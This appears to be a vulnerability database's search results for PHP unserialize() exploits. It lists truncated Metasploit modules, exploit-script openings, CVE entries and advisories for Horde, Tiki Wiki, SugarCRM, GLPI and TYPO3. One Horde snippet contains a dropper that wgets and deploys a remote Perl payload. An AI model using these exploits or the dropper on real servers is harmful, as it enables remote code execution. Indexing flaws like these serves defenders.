1318 matches found
Horde Framework Unserialize PHP Code Execution
No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def...
Invision IP.Board <= 3.3.4 unserialize() PHP Code Execution
No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...
Tiki Wiki <= 8.3 unserialize() PHP Code Execution
No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...
PHP < 4.5.0 - unserialize Overflow
No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require...
CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit
No description provided by source. $Id: cakephpcachecorruption.rb 11579 2011-01-14 16:25:37Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and...
PHP 3/4/5 Multiple Local And Remote Vulnerabilities (1)
No description provided by source. source: http://www.securityfocus.com/bid/11964/info PHP4 and PHP5 are reported prone to multiple local and remote vulnerabilities that may lead to code execution within the context of the vulnerable process. The following specific issues are reported: A heap-bas...
Tiki Wiki CMS Groupware <= 8.3 "unserialize()" PHP Code Execution
Tiki Wiki CMS Groupware 'unserialize'多个远程PHP代码执行漏洞 漏洞类型: 设计缺陷 漏洞成因: Tiki Wiki CMS Groupware v6.9、9.3之前版本存在安全漏洞,某些脚本对用户控制的输入使用了 "unserialize"操作,攻击者可利用此漏洞在受影响应用中注入和执行任意PHP代码。 修补建议: 更新到最新版本 http://info.tiki.org/article210-Tiki-10-0-is-here ?php /...
PHP <= 4.3.9 & phpBB 2.x with unserialize() Remote Exploit (compiled)
No description provided by source...
SugarCRM CE <= 6.3.1 "unserialize()" PHP Code Execution
No description provided by source. ?php / ------------------------------------------------------- SugarCRM CE = 6.3.1 unserialize PHP Code Execution ------------------------------------------------------- author...........: Egidio Romano aka EgiX mail.............: n0b0d13satgmaildotcom software...
RunCms <= 1.5.2 (debug_show.php) Remote SQL Injection Exploit
No description provided by source. ?php printr' -------------------------------------------------------------------------- RunCms = 1.5.2 /class/debug/debugshow.php sql injection / credentials disclosure exploit by rgod mail: retrog at alice dot it site: http://retrogod.altervista.org dork: Runcm...
Horde Framework Unserialize PHP Code Execution
ported from metasploit by irrlicht june 2014 modify dropper url and run use strict; use warnings; use LWP::UserAgent; use WWW::Mechanize; use MIME::Base64; if !$ARGV0 print "specify full login.php url\n"; exit; my $dropper = 'system"mkdir /tmp/\" \"; cd /tmp/\" \"; wget -O deploy.pl...
PHP 5.4.x < 5.4.30 Multiple Vulnerabilities
According to its banner, the version of PHP 5.4.x installed on the remote host is a version prior to 5.4.30. It is, therefore, affected by the following vulnerabilities : - Boundary checking errors exist related to the Fileinfo extension, Composite Document Format CDF handling and the functions...
openSUSE Security Update : typo3-cms-4_5 (openSUSE-SU-2014:0813-1)
typo3-cms-45 was updated to version 4.5.34 to fix eight security vulnerabilities and several other bugs. These security problems where fixed : - Add trusted HTTPHOST configuration CVE-2014-3941 - XSS in old extension manager information function CVE-2014-3943 - XSS in new content element wizard...
CVE-2013-2225
inc/ticket.class.php in GLPI 0.83.9 and earlier allows remote attackers to unserialize arbitrary PHP objects via the predefinedfields parameter to front/ticket.form.php...
CVE-2013-2225
CVE-2013-2225 affects GLPI: inc/ticket.class.php in GLPI 0.83.9 and earlier allows remote attackers to unserialize arbitrary PHP objects via _predefined_fields in front/ticket.form.php. OpenVAS/Mageia advisories confirm the issue and indicate a fix was released: upgrade to GLPI 0.83.91 (and patch...
CVE-2013-2225
inc/ticket.class.php in GLPI 0.83.9 and earlier allows remote attackers to unserialize arbitrary PHP objects via the predefinedfields parameter to front/ticket.form.php...
Code injection
inc/ticket.class.php in GLPI 0.83.9 and earlier allows remote attackers to unserialize arbitrary PHP objects via the predefinedfields parameter to front/ticket.form.php...
CVE-2013-2225
inc/ticket.class.php in GLPI 0.83.9 and earlier allows remote attackers to unserialize arbitrary PHP objects via the predefinedfields parameter to front/ticket.form.php...
Multiple Vulnerabilities in TYPO3 CMS
It has been discovered that TYPO3 CMS is vulnerable to Cross-Site Scripting, Insecure Unserialize, Improper Session Invalidation, Authentication Bypass, Information Disclosure and Host Spoofing. Component Type: TYPO3 CMS Vulnerability Types: Cross-Site Scripting, Insecure Unserialize, Improper...
Horde Framework Unserialize PHP Code Execution (CVE-2014-1691)
An arbitrary PHP code execution vulnerability has been reported in Horde . An attacker can exploit this vulnerability to execute arbitrary code with the permissions of the web server...